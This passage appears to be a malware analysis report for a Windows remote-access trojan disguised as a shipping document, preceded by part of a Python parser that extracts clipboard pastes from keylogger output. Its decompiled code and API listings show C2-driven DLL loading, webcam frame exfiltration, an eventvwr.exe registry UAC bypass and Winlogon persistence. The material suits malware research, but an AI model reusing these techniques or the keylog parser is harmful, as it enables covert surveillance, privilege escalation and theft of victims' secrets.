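def _split_chunk(chunk, events):
    """Split log text outside paste blocks into typed text and Ctrl events."""
    last = 0
    for m in CTRL_RE.finditer(chunk):
        if m.start() > last:
            events.append(("typed", chunk[last:m.start()], True))
        events.append(("ctrl", m.group(1), True))
        last = m.end()
    if last < len(chunk):
        events.append(("typed", chunk[last:], True))


def parse_keylog(text):
    """Return a list of (kind, value, complete) events.

    kind is "typed", "ctrl" or "paste"; complete is False only for a paste
    block whose end marker is missing (log truncated mid-paste)."""
    events = []
    pos = 0
    while pos < len(text):
        start = text.find(PASTE_START, pos)
        if start == -1:
            _split_chunk(text[pos:], events)
            break
        _split_chunk(text[pos:start], events)
        body_start = start + len(PASTE_START)
        end = text.find(PASTE_END, body_start)
        if end == -1:
            events.append(("paste", text[body_start:], False))
            break
        events.append(("paste", text[body_start:end], True))
        pos = end + len(PASTE_END)
    return events


def clipboard_pastes(text):
    """Just the clipboard contents, in order: the part most likely to hold secrets."""
    return [value for kind, value, _ in parse_keylog(text) if kind == "paste"]


if __name__ == "__main__":
    for ev in parse_keylog(SAMPLE_LOG):
        print(ev)
    print(clipboard_pastes(SAMPLE_LOG))
```

Searching for PASTE_START before applying the Ctrl regex matters: the paste marker itself starts with " [Ctrl + V]", so a naive regex pass would log a spurious Ctrl+V and then swallow the marker text as typed input.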

                                          APIs
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415940,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040250E
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DataStart]0000,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402522
                                          • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 0040252D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402541
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040254D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402556
                                          • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402561
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 00402570
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040257A
                                          • send.WS2_32(?,00000000), ref: 00402584
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402590
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040259A
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000), ref: 004025B4
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 004025BE
                                          • send.WS2_32(?,00000000), ref: 004025C8
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025D2
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025DB
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@?length@?$basic_string@$?data@?$basic_string@send$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@A?$basic_string@D@1@@D@2@@0@Hstd@@V01@V01@@V10@0@V?$basic_string@
                                          • String ID: [DataStart]0000
                                          • API String ID: 4073614965-1609390111
                                          • Opcode ID: 7e598602d1d75a9b31fa36fcff603eab0cdb362e5764c1e6d8b2889a5f4be3cd
                                          • Instruction ID: da84d689751dc417b3d6efdffba69dc45be3ba0d0bf169ed1abd597d19f590f1
                                          • Opcode Fuzzy Hash: 7e598602d1d75a9b31fa36fcff603eab0cdb362e5764c1e6d8b2889a5f4be3cd
                                          • Instruction Fuzzy Hash: 7D21EC72500009AFCB04EFA0DD5D9EE7B78EB58345B0041B5F906E61A0DFB49E89CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

C-Code - Quality: 20%
			// Decompiler output for the "fundlldata" / "funfunc" command handler. The
			// comments are based only on the strings and subcalls listed under APIs below;
			// _t68 and _t31 are decompiler temporaries and are used before assignment.
			E0040612A(void* __eflags, intOrPtr _a4, char _a8) {
				char _v20;
				char _v36;
				char _v52;
				char _v68;
				void* _t22;
				char* _t27;
				void* _t30;
				char* _t35;
				intOrPtr* _t58;
				void* _t61;
				void* _t64;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x415268);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_a8);
				E0040EFB5(__eflags);	// splits the received command (find/substr in the subcall)
				_t64 = _t61 + 0x24;
				// field 0 of the split command is the command name
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E00401289( &_v20, __eflags, 0),  &_v20);
				_t58 = __imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z;	// std::string == const char*
				_t22 =  *_t58( &_v36, "fundlldata");
				_t68 = _t22;
				if(_t22 == 0) {
					// not "fundlldata": on "funfunc", call the function pointer stored at
					// 0x4157c0 with atoi(field 1) as its argument
					__eflags =  *_t58( &_v36, "funfunc");
					if(__eflags != 0) {
						_t27 = E00401289( &_v20, __eflags, 1);
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						 *0x4157c0(atoi(_t27));
					}
				} else {
					// "fundlldata": E004052EC maps the object named by field 1
					// (CreateFileMappingA / MapViewOfFileEx / CloseHandle in the subcall)
					_t30 = E00401289( &_v20, _t68, 1);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					if(E004052EC(_t30) != 0) {
						// resolve "FunFunc" from the mapped image (lookup routine not listed here),
						// keep the pointer at 0x4157c0 and set 0x4157c4 as the loaded flag
						 *0x4157c0 = E00405546(_t31, "FunFunc");
						 *0x4157c4 = 1;
						_t35 =  &_v52;
						L0040FC1A();
						L0040FC14();
						// acknowledge with "funready" over the C2 channel: E00402198 wraps the
						// [DataStart] sender shown above
						E00402198(_a4, _t64);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t35, _t35, "funready", 0x415268, E0040EDD3( &_v68, 0x415988));
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				E00401B3C( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}
			Instruction addresses covered by the decompiled block: 0x0040613d through 0x00406260.

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 0040613D
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040614C
                                            • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                            • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                            • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040616C
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,fundlldata), ref: 00406181
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00406199
                                            • Part of subcall function 004052EC: CreateFileMappingA.KERNEL32 ref: 0040530E
                                            • Part of subcall function 004052EC: MapViewOfFileEx.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,0040BBF3,00000000), ref: 0040531D
                                            • Part of subcall function 004052EC: CloseHandle.KERNEL32(00000000,?,0040BBF3,00000000), ref: 00405326
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                            • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                            • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                            • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                            • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,funready,00415268,00000000,?,00415988,00000000,FunFunc), ref: 004061E0
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,?,00415988,00000000,FunFunc), ref: 004061EA
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988,00000000,FunFunc), ref: 004061FD
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415988,00000000,FunFunc), ref: 00406206
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,funfunc), ref: 00406217
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040622B
                                          • atoi.MSVCRT ref: 00406232
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406244
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406255
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$?length@?$basic_string@$?c_str@?$basic_string@D@2@@0@V?$basic_string@$G@2@@std@@G@std@@$??8std@@D@1@@FileHstd@@V12@$??4?$basic_string@?find@?$basic_string@?substr@?$basic_string@CloseCreateHandleMappingV01@V10@0@V10@@Viewatoi
                                          • String ID: FunFunc$fundlldata$funfunc$funready
                                          • API String ID: 298526877-738133096
                                          • Opcode ID: 65775b28cd64956663a998794ecdbee9d94c107cf5be0b532b6ba929ca3a8860
                                          • Instruction ID: a804b9d79a05e482a7dd7459e5937299dff8fe1282dbbe2cbe30763dd8b13e0d
                                          • Opcode Fuzzy Hash: 65775b28cd64956663a998794ecdbee9d94c107cf5be0b532b6ba929ca3a8860
                                          • Instruction Fuzzy Hash: BA313071900219ABCF04ABE1EC4E9EE7738FF45315B00447AF902B21D1DEB899948B59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _EH_prolog.MSVCRT ref: 00401F3F
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401F79
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00415268,?,00415268,004151F0), ref: 00401FA0
                                            • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                            • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,camframe,00415268,00000000), ref: 00401FBD
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00401FCA
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 00401FD7
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401FE4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401FF4
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401FFE
                                            • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                            • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402014
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040201D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402026
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040202F
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402038
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402041
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040204A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@V10@@_itoa
                                          • String ID: camframe
                                          • API String ID: 870949895-3510102068
                                          • Opcode ID: a43983bfdcaf14fcd2b42adcbfdaf3f22dfe03c5b3eb4796a0df1330b370d15a
                                          • Instruction ID: abce0e248e8dab4f9b6b1d1c922dc1d07b2fbcfaebd547229da4bc85d70ff786
                                          • Opcode Fuzzy Hash: a43983bfdcaf14fcd2b42adcbfdaf3f22dfe03c5b3eb4796a0df1330b370d15a
                                          • Instruction Fuzzy Hash: FA313C72D0001DABCB04EBA0ED4A9EEBB78FB55315F14407AF506B2091EB795A58CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00408EF1: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                            • Part of subcall function 00408EF1: RegQueryValueExA.KERNELBASE(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                            • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                            • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AA3
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AAC
                                          • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AB6
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AC1
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AD2
                                            • Part of subcall function 004090D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00415940), ref: 0040910B
                                            • Part of subcall function 004090D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409127
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?), ref: 00402AF7
                                            • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                            • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                            • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                            • Part of subcall function 00408FDA: RegSetValueExA.KERNELBASE(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                            • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                            • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                                            • Part of subcall function 0040712F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00402B24
                                          • ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00402B31
                                          • exit.MSVCRT ref: 00402B3D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B46
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B4F
                                          Strings
                                          • open, xrefs: 00402B2B
                                          • Software\Classes\mscfile\shell\open\command, xrefs: 00402AFE
                                          • eventvwr.exe, xrefs: 00402B09
                                          • origmsc, xrefs: 00402AC8
                                          • mscfile\shell\open\command, xrefs: 00402A86
                                          • C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe, xrefs: 00402AF2
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?c_str@?$basic_string@$??0?$basic_string@??1?$basic_string@$D@1@@$?length@?$basic_string@CloseValue$?size@?$basic_string@CreateExecuteOpenQueryShellV01@@exit
                                          • String ID: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                          • API String ID: 467877216-1000135773
                                          • Opcode ID: efcaee221ccb235fb3a56bc498791cb5357aed51ff3e3774293c8f9fdcbfe5a9
                                          • Instruction ID: 983c3f54951dff303221dc85f48cadd06facc0e56af3ae634be6270d9a423c28
                                          • Opcode Fuzzy Hash: efcaee221ccb235fb3a56bc498791cb5357aed51ff3e3774293c8f9fdcbfe5a9
                                          • Instruction Fuzzy Hash: D6218E72900109ABC700ABA19D8EEFF777DDB84705F10406AF506A2191DAF85E85CBAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 00405D64
                                            • Part of subcall function 00408EF1: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                            • Part of subcall function 00408EF1: RegQueryValueExA.KERNELBASE(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                            • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                            • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00405D8B
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405D94
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00405DA3
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 00405DD0
                                          • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 00405DD7
                                          • PathFileExistsA.SHLWAPI(?), ref: 00405DE4
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E1A
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405E67
                                            • Part of subcall function 0040F234: FindFirstFileA.KERNEL32(?,?,00415918,00410668,74B5FBA0), ref: 0040F2F5
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00410CC4,00000000), ref: 00405E38
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],?), ref: 00405E54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
